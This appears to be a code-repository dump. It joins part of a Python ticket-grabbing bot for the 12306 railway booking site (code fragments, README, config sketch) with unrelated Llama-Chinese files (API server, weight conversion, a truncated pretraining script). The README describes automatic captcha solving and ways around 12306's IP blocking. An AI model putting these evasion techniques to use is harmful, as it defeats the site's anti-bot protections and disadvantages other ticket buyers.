time.sleep(self.ifShowPassCodeTime) c.sendConfirmSingleForQueueAsys() else: print(u"排队发现未知错误{0},将此列车 {1}加入小黑屋".format(getQueueCountAsyncResult, self.train_no)) wrapcache.set(key=self.train_no, value=datetime.datetime.now(), timeout=TickerConfig.TICKET_BLACK_LIST_TIME * 60) elif "messages" in getQueueCountAsyncResult and getQueueCountAsyncResult["messages"]: print(u"排队异常,错误信息:{0}, 将此列车 {1}加入小黑屋".format(getQueueCountAsyncResult["messages"][0], self.train_no)) wrapcache.set(key=self.train_no, value=datetime.datetime.now(), timeout=TickerConfig.TICKET_BLACK_LIST_TIME * 60) else: if "validateMessages" in getQueueCountAsyncResult and getQueueCountAsyncResult["validateMessages"]: print(str(getQueueCountAsyncResult["validateMessages"])) File: myException/ticketNumOutException.py class ticketNumOutException(Exception): pass File: myException/UserPasswordException.py class UserPasswordException(Exception): pass File: myException/ticketConfigException.py class ticketConfigException(Exception): pass File: myException/__init__.py File: myException/ticketIsExitsException.py class ticketIsExitsException(Exception): pass File: myException/balanceException.py class balanceException(Exception): pass File: myException/PassengerUserException.py class PassengerUserException(Exception): pass File: tmp/__init__.py File: tmp/log/__init__.py
### 12306 ticket-booking assistant

#### Python version
- [ ] 2.7.10 - 2.7.15
- [x] 3.6 - 3.7.4
- [ ] 2.7.9

#### Available features
- [x] Automatic captcha recognition
- [x] Automatic login
- [x] On-time pre-sale booking and leftover-ticket sniping
- [x] Smart waitlisting (候补)
- [x] Email notification
- [x] ServerChan (server酱) notification

#### Dependencies
- Captchas can now be recognized locally. Download the model and place it in the project root; all of that code comes from [easy12306](https://github.com/zhaipro/easy12306), many thanks.
```
1. Model download: https://pan.baidu.com/s/1rS155VjweWVWIJogakechA  password: bmlm (also available in the QQ groups)
2. Git mirror: https://github.com/testerSunshine/12306model.git
```
- Self-hosted captcha server: [12306_code_server](https://github.com/YinAoXiong/12306_code_server)
  - If you have a spare server, you can set one up and add it to this [issue](https://github.com/testerSunshine/12306/issues/446) (please mind your server's security!)
- Project dependencies: [requirements.txt](requirements.txt)
  - Installation:
    - root user (avoids problems caused by multiple Python environments): `pip3 install -i https://pypi.tuna.tsinghua.edu.cn/simple -r requirements.txt`
    - non-root user (avoids installing and running in different environments): `pip3 install -i https://pypi.tuna.tsinghua.edu.cn/simple -r requirements.txt`
  - If tensorflow will not install on Windows, slightly lowering or raising its version both work.
```
1. Compatible tensorflow versions: 1.14.0rc / 1.15.0 / 1.15.0rc, all tested without problems.
2. If the Tsinghua PyPI mirror fails to download, switch to another mirror.
```

#### How to use
- Starting on a server:
  - Edit the [configuration](TickerConfig.py) file.
  - Email can be configured; the expected format is shown as an example in [TickerConfig.py](TickerConfig.py).
```
# Test whether email and ServerChan notifications work; the ServerChan test requires the ServerChan switch to be on.
# ServerChan notifications are recommended, see the guide: https://www.jianshu.com/p/8d10b5b9c4e3
# Whether you call python3 or python depends entirely on how your environment variables were set up; the commands below assume python3.
python3 run.py t
```
- When editing [TickerConfig.py](TickerConfig.py), watch the whitespace and follow Python syntax.
- Filter CDNs before starting; this step is `important`:
```
python3 run.py c
```
- Start the service:
```
python3 run.py r
```
- If you are unsure what to do, the help output may guide you:
```
python3 run.py -h
——————————————————————————
usage: run.py [-h] operate

positional arguments:
  operate  r: run the ticket grabber, c: filter CDNs, t: test email and ServerChan
```
- If your server has docker and docker-compose installed, you can skip **all** of the steps above and start grabbing tickets as follows:
  - Prerequisites:
    - Make sure your docker version is 18.09 or later: `docker -v`
    - Make sure your docker-compose version is 1.23.2 or later: `docker-compose -v`
    - Adjust the configuration file `TickerConfig.py` to your needs.
    - In `TickerConfig.py`, set `AUTO_CODE_TYPE` to `3` and `HOST` to `"captcha:80"` (this matters: it points the program at the local captcha server).
  - Commands:
    - Start grabbing tickets: `docker-compose up --build -d`
    - Stop: `docker-compose down`
    - View the logs: `docker logs --follow ticket`

#### Directory layout
- agency - CDN proxy
- config - project configuration
- verify - automatic captcha recognition
- init - main entry point of the project
- inter - 12306 API wrappers
- myException - exceptions
- myUrllib - request/network wrapper

#### Flow diagram
- ![image](uml/uml.png)

#### Project statement
- This software is for learning and exchange only; do not use it commercially. QQ groups:
  - Group 1: 286271084 (full)
  - Group 2: 649992274 (full)
  - Group 3: 632501142 (full)
  - Group 4: 606340519 (full)
  - Group 5: 948526733 (full)
  - Group 7: 660689659 (full)
  - Group 8: 620629239 (full)
  - Group 6: 608792930 (open)
  - Group 9: 693035807 (open)
- Please do not join more than one group; one is enough, leave room for others.
- **Read the group announcement first!!! Read the group announcement first!!! Read the group announcement first!!! Important things get said three times.**
- Getting you a ticket home is my biggest wish.

#### Log example
- A successful log. If your booking fails, please send me the failing log and I will do my best to debug it; you can also discuss it in the group. The program only speeds up the purchase; it cannot guarantee a ticket.
```
Query attempt 355  travel date: 2018-02-12  trains: G4741,G2365,G1371,G1377,G1329  no tickets found  proxy: none  total time: 429ms
Train: G4741  departure: Shanghai  destination: Shaoyang  second class: available
Trying to submit the booking...
Submitting the order...
Ticket issued successfully
Queued successfully, remaining tickets: 359
Using automatic captcha recognition
Captcha passed, submitting the order
Order submitted successfully!
Estimated queue time remaining: -12 ms
Estimated queue time remaining: -6 ms
Estimated queue time remaining: -7 ms
Estimated queue time remaining: -4 ms
Estimated queue time remaining: -4 ms
Congratulations, your booking succeeded. Order number: EB52743573. Please log in to 12306 in your browser right away, open "Unfinished orders", and pay within 30 minutes!
```

#### Help (frequently reported installation and usage issues)
- Test whether your email works: [email configuration issues](https://github.com/testerSunshine/12306/issues/107)
- Student tickets: [student ticket changes](https://github.com/testerSunshine/12306/issues/47)
- Wrong dependencies installed (ImportError): [requirements.txt issues](https://github.com/testerSunshine/12306/issues/91)
- Questions about Ruokuai (若快) captcha credits: [see here](https://github.com/testerSunshine/12306/issues/67)
- IOError: 【Errno 0】 Error: [see here](https://github.com/testerSunshine/12306/issues/159)
- Test whether the order-submission endpoints work; there are two of them and either is fine.
- If the captcha download expires or fails, it is most likely 12306's IP-blocking policy: retry a few times. 12306 currently blocks datacenter IPs (Alibaba Cloud, Tencent Cloud) aggressively, so avoid running this on such servers.
- 12306 is currently quite sensitive to server IPs, so it is best to run the program from home.
- Automatic IP switching currently supports TP-LINK and Xiaomi routers, home networks only: [AutoRouterIP](https://github.com/testerSunshine/AutoRouterIP)

#### Thanks to the following contributors
- @[email protected]
- @ 才
- @[MonsterTan](https://github.com/MonsterTan)
- and everyone who has submitted PRs to this project.

#### Changelog
- [Update log](Update.md)
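
The guide above repeatedly asks you to edit `TickerConfig.py`, but the file itself is not reproduced in this section. Purely as an illustration, the sketch below lists only the settings that the code in `inter/` and the Docker notes actually reference; every value is a placeholder, and the authoritative set of options is the `TickerConfig.py` shipped with the project.

```python
# TickerConfig.py: an illustrative sketch only, not the real file. All values are
# placeholders; only settings referenced by the code shown above are listed.
IS_PROXY = 0                 # passed to HTTPClient(); non-zero enables proxying (assumed semantics)
IS_CDN = 1                   # 1 = query through the CDN list produced by `python3 run.py c`
TICKET_BLACK_LIST_TIME = 5   # minutes a failed train number stays blacklisted

FROM_STATION = "深圳"         # departure station name used in order requests
TO_STATION = "长沙"           # arrival station name used in order requests
TICKET_PEOPLES = ["张三"]     # passenger names exactly as stored in the 12306 account
IS_MORE_TICKET = True        # book for fewer people when not enough tickets remain
TICKET_TYPE = 1              # 2 enables the waitlist (候补) branch in Query.sendQuery

SET_TYPE = ["二等座"]         # preferred seat classes; the first entry is used for waitlisting
PASSENGER_TICKER_STR = {     # seat-class name -> 12306 seat code
    '一等座': 'M', '特等座': 'P', '二等座': 'O', '商务座': 9,   # values assumed from
    '硬座': 1, '无座': 1, '软座': 2, '软卧': 4, '硬卧': 3,      # getPassengerTicketStr above
}

AUTO_CODE_TYPE = 2           # 2 = local captcha model, 3 = self-hosted captcha server
HOST = "captcha:80"          # captcha server address when AUTO_CODE_TYPE == 3 (see Docker notes)
```
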
Llama-Chinese
ecff929b627122ef10da3f7ed2085caf793ba7e5
File: scripts/api/accelerate_client.py # coding=utf-8 import json import time import urllib.request import sys def test_api_server(input_text): header = {'Content-Type': 'application/json'} data = { "system_prompt": "", "history": inputs, "n" : 1, "best_of": 1, "presence_penalty": 1.2, "frequency_penalty": 0.2, "temperature": 0.3, "top_p" : 0.95, "top_k": 50, "use_beam_search": False, "stop": [], "ignore_eos" :False, "logprobs": None, "max_new_tokens": 2048, } request = urllib.request.Request( url='http://127.0.0.1:8001/generate', headers=header, data=json.dumps(data).encode('utf-8') ) result = None try: response = urllib.request.urlopen(request, timeout=300) res = response.read().decode('utf-8') result = json.loads(res) print(json.dumps(data, ensure_ascii=False, indent=2)) print(json.dumps(result, ensure_ascii=False, indent=2)) except Exception as e: print(e) return result if __name__ == "__main__": # 多伦对话测试 """ 多伦对话测试 last_question = "怎么回来呢" inputs = [{"role": "Human", "content": "如何去北京"}, {"role": "Assitant", "content": "乘坐飞机或者轮船"}, {"role" : "Human", "content": last_question}] """ # 单轮对话 last_question = "怎么去北京" inputs = [ {"role" : "Human", "content": last_question}] test_api_server(inputs) File: scripts/api/accelerate_server.py # coding=utf-8 import argparse import gc import math import os import time from fastapi import FastAPI, Request from transformers import AutoTokenizer, AutoModel import uvicorn, json, datetime import torch import torch.distributed as dist from transformers import AutoConfig, AutoModelForCausalLM, AutoTokenizer parser = argparse.ArgumentParser() parser.add_argument('--model_path',required=True,type=str) parser.add_argument('--gpus', default="0", type=str) parser.add_argument('--infer_dtype', default="int8", choices=["int4", "int8", "float16"], required=False,type=str) parser.add_argument('--model_source', default="llama2_chinese", choices =["llama2_chinese", "llama2_meta", "llama3_meta"], required=False,type=str) args = parser.parse_args() os.environ["CUDA_VISIBLE_DEVICES"] = args.gpus local_rank = int(os.getenv("LOCAL_RANK", "0")) world_size = torch.cuda.device_count() rank = local_rank app = FastAPI() def get_prompt_llama2chinese( chat_history, system_prompt="" ) -> str: prompt = '' for input_text_one in chat_history: prompt += "<s>"+input_text_one['role']+": "+input_text_one['content'].strip()+"\n</s>" if chat_history[-1]['role']=='Human': prompt += "<s>Assistant: " else: prompt += "<s>Human: " prompt = prompt[-2048:] if len(system_prompt)>0: prompt = '<s>System: '+system_prompt.strip()+'\n</s>'+prompt return prompt def get_prompt(chat_history, system_prompt=""): B_INST, E_INST = "[INST]", "[/INST]" B_SYS, E_SYS = "<<SYS>>\n", "\n<</SYS>>\n\n" sep = " " sep2 =" </s><s>" stop_token_ids = [2] system_template = f"[INST] <<SYS>>\n{system_prompt}\n<</SYS>>\n\n" roles = ("[INST]", "[/INST]") seps = [sep, sep2] if system_prompt.strip() != "": ret = system_template else: ret = "[INST] " for i, chat in enumerate(chat_history): message = chat["content"] role = chat["role"] if message: if i == 0: ret += message + " " else: if role == "Human": ret += "[INST]" + " " + message + seps[i % 2] else: ret += "[/INST]" + " " + message + seps[i % 2] else: if role == "Human": ret += "[INST]" else: ret += "[/INST]" print("prompt:{}".format(ret)) return ret def get_prompt_llama3(chat_history, system_prompt=""): system_format='<|start_header_id|>system<|end_header_id|>\n\n{content}<|eot_id|>' user_format='<|start_header_id|>user<|end_header_id|>\n\n{content}<|eot_id|>' 
assistant_format='<|start_header_id|>assistant<|end_header_id|>\n\n{content}<|eot_id|>\n' prompt_str = '' # 拼接历史对话 for item in chat_history: if item['role']=='Human': prompt_str+=user_format.format(content=item['content']) else: prompt_str+=assistant_format.format(content=item['content']) if len(system_prompt)>0: prompt_str = system_format.format(content=system_prompt) + prompt_str prompt_str = "<|begin_of_text|>" + prompt_str return prompt_str @app.post("/generate") async def create_item(request: Request): global model, tokenizer json_post_raw = await request.json() json_post = json.dumps(json_post_raw) json_post_list = json.loads(json_post) history = json_post_list.get('history') system_prompt = json_post_list.get('system_prompt') max_new_tokens = json_post_list.get('max_new_tokens') top_p = json_post_list.get('top_p') temperature = json_post_list.get('temperature') if args.model_source == "llama2_meta": prompt = get_prompt(history, system_prompt) elif args.model_source == "llama3_meta": prompt = get_prompt_llama3(history, system_prompt) else: prompt = get_prompt_llama2chinese(history, system_prompt) inputs = tokenizer([prompt], return_tensors='pt').to("cuda") generate_kwargs = dict( inputs, # streamer=streamer, max_new_tokens=max_new_tokens, do_sample=True, top_p=top_p, top_k=50, temperature=temperature, num_beams=1, repetition_penalty=1.2, max_length=2048, ) generate_ids = model.generate(**generate_kwargs) generate_ids = [item[len(inputs[0]):-1] for item in generate_ids] bot_message = tokenizer.batch_decode(generate_ids, skip_special_tokens=True, clean_up_tokenization_spaces=False)[0] if 'Human:' in bot_message: bot_message = bot_message.split('Human:')[0] now = datetime.datetime.now() time = now.strftime("%Y-%m-%d %H:%M:%S") answer = { "response": bot_message, "status": 200, "time": time } return answer def get_world_size() -> int: if dist.is_initialized(): return dist.get_world_size() else: return 1 def print_rank0(*msg): if rank != 0: return print(*msg) if __name__ == '__main__': dtype = torch.float16 kwargs = dict( device_map="auto", ) print("get_world_size:{}".format(get_world_size())) infer_dtype = args.infer_dtype if infer_dtype not in ["int4", "int8", "float16"]: raise ValueError("infer_dtype must one of int4, int8 or float16") if get_world_size() > 1: kwargs["device_map"] = "balanced_low_0" if infer_dtype == "int8": print_rank0("Using `load_in_8bit=True` to use quanitized model") kwargs["load_in_8bit"] = True else: kwargs["torch_dtype"] = dtype tokenizer = AutoTokenizer.from_pretrained(args.model_path, trust_remote_code=True) if infer_dtype in ["int8", "float16"]: model = AutoModelForCausalLM.from_pretrained(args.model_path, **kwargs,trust_remote_code=True,use_flash_attention_2=True) elif infer_dtype == "int4": from auto_gptq import AutoGPTQForCausalLM, get_gptq_peft_model model = AutoGPTQForCausalLM.from_quantized( args.model_path, device="cuda:0", use_triton=False, low_cpu_mem_usage=True, # inject_fused_attention=False, # inject_fused_mlp=False ) model.eval() uvicorn.run(app, host='0.0.0.0', port=8001, workers=1) File: scripts/convert2hf/convert_llama_weights_to_hf.py # Copyright 2022 EleutherAI and The HuggingFace Inc. team. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
# You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import argparse import gc import json import os import shutil import warnings import torch from transformers import LlamaConfig, LlamaForCausalLM, LlamaTokenizer try: from transformers import LlamaTokenizerFast except ImportError as e: warnings.warn(e) warnings.warn( "The converted tokenizer will be the `slow` tokenizer. To use the fast, update your `tokenizers` library and re-run the tokenizer conversion" ) LlamaTokenizerFast = None """ Sample usage: ``` python src/transformers/models/llama/convert_llama_weights_to_hf.py \ --input_dir /path/to/downloaded/llama/weights --model_size 7B --output_dir /output/path ``` Thereafter, models can be loaded via: ```py from transformers import LlamaForCausalLM, LlamaTokenizer model = LlamaForCausalLM.from_pretrained("/output/path") tokenizer = LlamaTokenizer.from_pretrained("/output/path") ``` Important note: you need to be able to host the whole model in RAM to execute this script (even if the biggest versions come in several checkpoints they each contain a part of each weight of the model, so we need to load them all in RAM). """ INTERMEDIATE_SIZE_MAP = { "7B": 11008, "13B": 13824, "30B": 17920, "65B": 22016, "70B": 28672, } NUM_SHARDS = { "7B": 1, "7Bf": 1, "13B": 2, "13Bf": 2, "30B": 4, "65B": 8, "70B": 8, "70Bf": 8, } def compute_intermediate_size(n, ffn_dim_multiplier=1, multiple_of=256): return multiple_of * ((int(ffn_dim_multiplier * int(8 * n / 3)) + multiple_of - 1) // multiple_of) def read_json(path): with open(path, "r") as f: return json.load(f) def write_json(text, path): with open(path, "w") as f: json.dump(text, f) def write_model(model_path, input_base_path, model_size, safe_serialization=True): os.makedirs(model_path, exist_ok=True) tmp_model_path = os.path.join(model_path, "tmp") os.makedirs(tmp_model_path, exist_ok=True) params = read_json(os.path.join(input_base_path, "params.json")) num_shards = NUM_SHARDS[model_size] n_layers = params["n_layers"] n_heads = params["n_heads"] n_heads_per_shard = n_heads // num_shards dim = params["dim"] dims_per_head = dim // n_heads base = 10000.0 inv_freq = 1.0 / (base ** (torch.arange(0, dims_per_head, 2).float() / dims_per_head)) if "n_kv_heads" in params: num_key_value_heads = params["n_kv_heads"] # for GQA / MQA num_local_key_value_heads = n_heads_per_shard // num_key_value_heads key_value_dim = dim // num_key_value_heads else: # compatibility with other checkpoints num_key_value_heads = n_heads num_local_key_value_heads = n_heads_per_shard key_value_dim = dim # permute for sliced rotary def permute(w, n_heads=n_heads, dim1=dim, dim2=dim): return w.view(n_heads, dim1 // n_heads // 2, 2, dim2).transpose(1, 2).reshape(dim1, dim2) print(f"Fetching all parameters from the checkpoint at {input_base_path}.") # Load weights if model_size == "7B": # Not sharded # (The sharded implementation would also work, but this is simpler.) 
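        # The 7B release ships as a single consolidated.00.pth file; larger sizes are split
        # into one consolidated.XX.pth file per shard and are loaded as a list in the else
        # branch below so that per-layer tensors can be re-stitched across shards.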
loaded = torch.load(os.path.join(input_base_path, "consolidated.00.pth"), map_location="cpu") else: # Sharded loaded = [ torch.load(os.path.join(input_base_path, f"consolidated.{i:02d}.pth"), map_location="cpu") for i in range(num_shards) ] param_count = 0 index_dict = {"weight_map": {}} for layer_i in range(n_layers): filename = f"pytorch_model-{layer_i + 1}-of-{n_layers + 1}.bin" if model_size == "7B": # Unsharded state_dict = { f"model.layers.{layer_i}.self_attn.q_proj.weight": permute( loaded[f"layers.{layer_i}.attention.wq.weight"] ), f"model.layers.{layer_i}.self_attn.k_proj.weight": permute( loaded[f"layers.{layer_i}.attention.wk.weight"] ), f"model.layers.{layer_i}.self_attn.v_proj.weight": loaded[f"layers.{layer_i}.attention.wv.weight"], f"model.layers.{layer_i}.self_attn.o_proj.weight": loaded[f"layers.{layer_i}.attention.wo.weight"], f"model.layers.{layer_i}.mlp.gate_proj.weight": loaded[f"layers.{layer_i}.feed_forward.w1.weight"], f"model.layers.{layer_i}.mlp.down_proj.weight": loaded[f"layers.{layer_i}.feed_forward.w2.weight"], f"model.layers.{layer_i}.mlp.up_proj.weight": loaded[f"layers.{layer_i}.feed_forward.w3.weight"], f"model.layers.{layer_i}.input_layernorm.weight": loaded[f"layers.{layer_i}.attention_norm.weight"], f"model.layers.{layer_i}.post_attention_layernorm.weight": loaded[f"layers.{layer_i}.ffn_norm.weight"], } else: # Sharded # Note that attention.w{q,k,v,o}, feed_fordward.w[1,2,3], attention_norm.weight and ffn_norm.weight share # the same storage object, saving attention_norm and ffn_norm will save other weights too, which is # redundant as other weights will be stitched from multiple shards. To avoid that, they are cloned. state_dict = { f"model.layers.{layer_i}.input_layernorm.weight": loaded[0][ f"layers.{layer_i}.attention_norm.weight" ].clone(), f"model.layers.{layer_i}.post_attention_layernorm.weight": loaded[0][ f"layers.{layer_i}.ffn_norm.weight" ].clone(), } state_dict[f"model.layers.{layer_i}.self_attn.q_proj.weight"] = permute( torch.cat( [ loaded[i][f"layers.{layer_i}.attention.wq.weight"].view(n_heads_per_shard, dims_per_head, dim) for i in range(num_shards) ], dim=0, ).reshape(dim, dim) ) state_dict[f"model.layers.{layer_i}.self_attn.k_proj.weight"] = permute( torch.cat( [ loaded[i][f"layers.{layer_i}.attention.wk.weight"].view( num_local_key_value_heads, dims_per_head, dim ) for i in range(num_shards) ], dim=0, ).reshape(key_value_dim, dim), num_key_value_heads, key_value_dim, dim, ) state_dict[f"model.layers.{layer_i}.self_attn.v_proj.weight"] = torch.cat( [ loaded[i][f"layers.{layer_i}.attention.wv.weight"].view( num_local_key_value_heads, dims_per_head, dim ) for i in range(num_shards) ], dim=0, ).reshape(key_value_dim, dim) state_dict[f"model.layers.{layer_i}.self_attn.o_proj.weight"] = torch.cat( [loaded[i][f"layers.{layer_i}.attention.wo.weight"] for i in range(num_shards)], dim=1 ) state_dict[f"model.layers.{layer_i}.mlp.gate_proj.weight"] = torch.cat( [loaded[i][f"layers.{layer_i}.feed_forward.w1.weight"] for i in range(num_shards)], dim=0 ) state_dict[f"model.layers.{layer_i}.mlp.down_proj.weight"] = torch.cat( [loaded[i][f"layers.{layer_i}.feed_forward.w2.weight"] for i in range(num_shards)], dim=1 ) state_dict[f"model.layers.{layer_i}.mlp.up_proj.weight"] = torch.cat( [loaded[i][f"layers.{layer_i}.feed_forward.w3.weight"] for i in range(num_shards)], dim=0 ) state_dict[f"model.layers.{layer_i}.self_attn.rotary_emb.inv_freq"] = inv_freq for k, v in state_dict.items(): index_dict["weight_map"][k] = filename param_count += v.numel() 
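        # Each layer is written out as its own temporary shard file; index_dict["weight_map"]
        # records which file holds every tensor and is later dumped as pytorch_model.bin.index.json.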
torch.save(state_dict, os.path.join(tmp_model_path, filename)) filename = f"pytorch_model-{n_layers + 1}-of-{n_layers + 1}.bin" if model_size == "7B": # Unsharded state_dict = { "model.embed_tokens.weight": loaded["tok_embeddings.weight"], "model.norm.weight": loaded["norm.weight"], "lm_head.weight": loaded["output.weight"], } else: state_dict = { "model.norm.weight": loaded[0]["norm.weight"], "model.embed_tokens.weight": torch.cat( [loaded[i]["tok_embeddings.weight"] for i in range(num_shards)], dim=1 ), "lm_head.weight": torch.cat([loaded[i]["output.weight"] for i in range(num_shards)], dim=0), } for k, v in state_dict.items(): index_dict["weight_map"][k] = filename param_count += v.numel() torch.save(state_dict, os.path.join(tmp_model_path, filename)) # Write configs index_dict["metadata"] = {"total_size": param_count * 2} write_json(index_dict, os.path.join(tmp_model_path, "pytorch_model.bin.index.json")) ffn_dim_multiplier = params["ffn_dim_multiplier"] if "ffn_dim_multiplier" in params else 1 multiple_of = params["multiple_of"] if "multiple_of" in params else 256 config = LlamaConfig( hidden_size=dim, intermediate_size=compute_intermediate_size(dim, ffn_dim_multiplier, multiple_of), num_attention_heads=params["n_heads"], num_hidden_layers=params["n_layers"], rms_norm_eps=params["norm_eps"], num_key_value_heads=num_key_value_heads, ) config.save_pretrained(tmp_model_path) # Make space so we can load the model properly now. del state_dict del loaded gc.collect() print("Loading the checkpoint in a Llama model.") model = LlamaForCausalLM.from_pretrained(tmp_model_path, torch_dtype=torch.float16, low_cpu_mem_usage=True) # Avoid saving this as part of the config. del model.config._name_or_path print("Saving in the Transformers format.") model.save_pretrained(model_path, safe_serialization=safe_serialization) shutil.rmtree(tmp_model_path) def write_tokenizer(tokenizer_path, input_tokenizer_path): # Initialize the tokenizer based on the `spm` model tokenizer_class = LlamaTokenizer if LlamaTokenizerFast is None else LlamaTokenizerFast print(f"Saving a {tokenizer_class.__name__} to {tokenizer_path}.") tokenizer = tokenizer_class(input_tokenizer_path) tokenizer.save_pretrained(tokenizer_path) def main(): parser = argparse.ArgumentParser() parser.add_argument( "--input_dir", help="Location of LLaMA weights, which contains tokenizer.model and model folders", ) parser.add_argument( "--model_size", choices=["7B", "7Bf", "13B", "13Bf", "30B", "65B", "70B", "70Bf", "tokenizer_only"], help="'f' models correspond to the finetuned versions, and are specific to the Llama2 official release. For more details on Llama2, checkout the original repo: https://huggingface.co/meta-llama", ) parser.add_argument( "--output_dir", help="Location to write HF model and tokenizer", ) parser.add_argument("--safe_serialization", type=bool, help="Whether or not to save using `safetensors`.") args = parser.parse_args() if args.model_size != "tokenizer_only": write_model( model_path=args.output_dir, # input_base_path=os.path.join(args.input_dir, args.model_size), input_base_path=args.input_dir, model_size=args.model_size, safe_serialization=args.safe_serialization, ) spm_path = os.path.join(args.input_dir, "tokenizer.model") write_tokenizer(args.output_dir, spm_path) if __name__ == "__main__": main() File: train/pretrain/pretrain_clm.py #!/usr/bin/env python # coding=utf-8 # Copyright 2020 The HuggingFace Inc. team. All rights reserved. 
# # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Fine-tuning the library models for causal language modeling (GPT, GPT-2, CTRL, ...) on a text file or a dataset. Here is the full list of checkpoints on the hub that can be fine-tuned by this script: https://huggingface.co/models?filter=text-generation """ # You can also adapt this script on your own causal language modeling task. Pointers for this are left as comments. import logging import math import os import sys from dataclasses import dataclass, field from torchdata.datapipes.iter import IterDataPipe, IterableWrapper from itertools import chain import deepspeed from typing import Optional,List import datasets import pandas as pd import evaluate import torch from datasets import load_dataset from datasets.combine import interleave_datasets import transformers from transformers.trainer_utils import PREFIX_CHECKPOINT_DIR from transformers import ( CONFIG_MAPPING, MODEL_FOR_CAUSAL_LM_MAPPING, AutoConfig, AutoModelForCausalLM, AutoTokenizer, TrainerCallback, TrainerState, TrainerControl, HfArgumentParser, Trainer, TrainingArguments, default_data_collator, is_torch_tpu_available, set_seed, ) import datetime from transformers.testing_utils import CaptureLogger from transformers.trainer_utils import get_last_checkpoint from transformers.utils import check_min_version, send_example_telemetry from transformers.utils.versions import require_version from datasets import interleave_datasets # Will error if the minimal version of Transformers is not installed. Remove at your own risks. # check_min_version("4.27.0.dev0") require_version("datasets>=1.8.0", "To fix: pip install -r examples/pytorch/language-modeling/requirements.txt") logger = logging.getLogger(__name__) MODEL_CONFIG_CLASSES = list(MODEL_FOR_CAUSAL_LM_MAPPING.keys()) MODEL_TYPES = tuple(conf.model_type for conf in MODEL_CONFIG_CLASSES) @dataclass class ModelArguments: """ Arguments pertaining to which model/config/tokenizer we are going to fine-tune, or train from scratch. """ model_name_or_path: Optional[str] = field( default=None, metadata={ "help": ( "The model checkpoint for weights initialization.Don't set if you want to train a model from scratch." ) }, ) model_type: Optional[str] = field( default=None, metadata={"help": "If training from scratch, pass a model type from the list: " + ", ".join(MODEL_TYPES)}, ) config_overrides: Optional[str] = field( default=None, metadata={ "help": ( "Override some existing default config settings when a model is trained from scratch. 
Example: " "n_embd=10,resid_pdrop=0.2,scale_attn_weights=false,summary_type=cls_index" ) }, ) config_name: Optional[str] = field( default=None, metadata={"help": "Pretrained config name or path if not the same as model_name"} ) tokenizer_name: Optional[str] = field( default=None, metadata={"help": "Pretrained tokenizer name or path if not the same as model_name"} ) cache_dir: Optional[str] = field( default=None, metadata={"help": "Where do you want to store the pretrained models downloaded from huggingface.co"}, ) use_fast_tokenizer: bool = field( default=True, metadata={"help": "Whether to use one of the fast tokenizer (backed by the tokenizers library) or not."}, ) model_revision: str = field( default="main", metadata={"help": "The specific model version to use (can be a branch name, tag name or commit id)."}, ) use_auth_token: bool = field( default=False, metadata={ "help": ( "Will use the token generated when running `huggingface-cli login` (necessary to use this script " "with private models)." ) }, ) torch_dtype: Optional[str] = field( default=None, metadata={ "help": ( "Override the default `torch.dtype` and load the model under this dtype. If `auto` is passed, the " "dtype will be automatically derived from the model's weights." ), "choices": ["auto", "bfloat16", "float16", "float32"], }, ) def __post_init__(self): if self.config_overrides is not None and (self.config_name is not None or self.model_name_or_path is not None): raise ValueError( "--config_overrides can't be used in combination with --config_name or --model_name_or_path" ) @dataclass class DataTrainingArguments: """ Arguments pertaining to what data we are going to input our model for training and eval. """ dataset_name: Optional[str] = field( default=None, metadata={"help": "The name of the dataset to use (via the datasets library)."} ) dataset_config_name: Optional[str] = field( default=None, metadata={"help": "The configuration name of the dataset to use (via the datasets library)."} ) train_files: Optional[List[str]] = field(default=None, metadata={"help": "The input training data file (a text file)."}) validation_files: Optional[List[str]] = field( default=None, metadata={"help": "An optional input evaluation data file to evaluate the perplexity on (a text file)."}, ) max_train_samples: Optional[int] = field( default=None, metadata={ "help": ( "For debugging purposes or quicker training, truncate the number of training examples to this " "value if set." ) }, ) max_eval_samples: Optional[int] = field( default=None, metadata={ "help": ( "For debugging purposes or quicker training, truncate the number of evaluation examples to this " "value if set." ) }, ) streaming: bool = field(default=False, metadata={"help": "Enable streaming mode"}) block_size: Optional[int] = field( default=None, metadata={ "help": ( "Optional input sequence length after tokenization. " "The training dataset will be truncated in block of this size for training. " "Default to the model max input length for single sentence inputs (take into account special tokens)." 
) }, ) overwrite_cache: bool = field( default=False, metadata={"help": "Overwrite the cached training and evaluation sets"} ) validation_split_percentage: Optional[int] = field( default=5, metadata={ "help": "The percentage of the train set used as validation set in case there's no validation split" }, ) preprocessing_num_workers: Optional[int] = field( default=None, metadata={"help": "The number of processes to use for the preprocessing."}, ) keep_linebreaks: bool = field( default=True, metadata={"help": "Whether to keep line breaks when using TXT files or not."} ) def __post_init__(self): if self.streaming: require_version("datasets>=2.0.0", "The streaming feature requires `datasets>=2.0.0`") if self.dataset_name is None and self.train_files is None and self.validation_files is None: raise ValueError("Need either a dataset name or a training/validation file.") else: if self.train_files is not None: extension = self.train_files[0].split(".")[-1] assert extension in ["csv", "json", "txt"], "`train_file` should be a csv, a json or a txt file." if self.validation_files is not None: extension = self.validation_files[0].split(".")[-1] assert extension in ["csv", "json", "txt"], "`validation_file` should be a csv, a json or a txt file." def main(): # See all possible arguments in src/transformers/training_args.py # or by passing the --help flag to this script. # We now keep distinct sets of args, for a cleaner separation of concerns. parser = HfArgumentParser((ModelArguments, DataTrainingArguments, TrainingArguments)) if len(sys.argv) == 2 and sys.argv[1].endswith(".json"): # If we pass only one argument to the script and it's the path to a json file, # let's parse it to get our arguments. model_args, data_args, training_args = parser.parse_json_file(json_file=os.path.abspath(sys.argv[1])) else: model_args, data_args, training_args = parser.parse_args_into_dataclasses() # Sending telemetry. Tracking the example usage helps us better allocate resources to maintain them. The # information sent is the one passed as arguments along with your Python/PyTorch versions. send_example_telemetry("run_clm", model_args, data_args) # Setup logging logging.basicConfig( format="%(asctime)s - %(levelname)s - %(name)s - %(message)s", datefmt="%m/%d/%Y %H:%M:%S", handlers=[logging.StreamHandler(sys.stdout)], ) if training_args.should_log: # The default of 